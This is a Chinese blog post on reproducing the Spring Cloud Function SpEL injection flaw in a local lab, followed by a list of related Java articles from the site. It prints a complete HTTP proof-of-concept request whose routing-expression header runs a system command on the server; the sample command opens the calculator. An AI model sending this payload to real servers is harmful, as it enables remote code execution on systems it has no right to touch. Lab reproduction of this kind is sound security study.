Spring-Cloud-Function-Spel 漏洞环境搭建
1、漏洞环境搭建
由于漏洞出现在前两天,原本等待vulhub出环境,直接docker 一键就ok了。但是这次vulhub好像不太及时。对于自己只能自己搭建环境了。
找了许久,终于在唐大佬的github中找到几乎一键的方法。
参考链接:https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel 这里放原始链接以表示尊重。
无法上github的话,私信我。
搭建方法很简单,先安装maven jdk 等。大佬是jdk17 我本地下载最新版本18 也是ok
方法如下:下载代码后,在解压目录cmd执行 mvn spring-boot:run 会下载很多库,需要耐心等待。成功后会开启8080 端口。
漏洞poc极其简单:
路径最好使用funtionRouter,原因自查。此环境倒是任意路径都ok。
POST /functionRouter HTTP/1.1
Host: 192.168.1.7:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
漏洞验证:
到此这篇关于Spring-Cloud-Function-Spel 漏洞复现的文章就介绍到这了,更多相关Spring-Cloud-Function-Spel 漏洞内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
相关文章
本文主要介绍了SpringBoot接入钉钉自定义机器人预警通知,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2022-07-07
这篇文章主要介绍了实例讲解Java并发编程之变量,本文讲解了编写线程安全需要关心的共享变量和可变变量,需要的朋友可以参考下2015-04-04
java中synchronized(同步代码块和同步方法)详解及区别
这篇文章主要介绍了 java中synchronized(同步代码块和同步方法)详解及区别的相关资料,需要的朋友可以参考下2017-02-02
这篇文章主要介绍了Spring6整合JUnit的详细步骤,本文结合实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下2023-05-05
reduce 操作是一种通用的归约操作,它可以实现从 Stream 中生成一个值,其生成的值不是随意的,而是根据指定的计算模型,下面我们就来深入了解下java8中的reduce操作吧2023-12-12
所谓IO,也就是Input与Output的缩写。在java中,IO涉及的范围比较大,这里主要讨论针对文件内容的读写,感兴趣的朋友可以了解下2013-01-01
快速了解Spring框架中的@Bean注解?本文将带你一键掌握其核心作用!只需一篇短文,揭示@Bean注解如何在Spring中定义bean实例,以及管理和装配Bean的奥秘,阅读指南,让Spring开发更加得心应手!2024-01-01
这篇文章主要为大家详细介绍了java单链表使用总结,文中示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下2022-01-01
mybatis自动生成@Table、@Column、@Id注解的方法
这篇文章主要介绍了mybatis自动生成@Table、@Column、@Id注解的方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2020-12-12
一提到happens-before原则,就让人有点“丈二和尚摸不着头脑”。这个涵盖了整个JMM中可见性原则的规则,究竟如何理解,把我个人一些理解记录下来。下面可以和小编一起学习2019-05-05
最新评论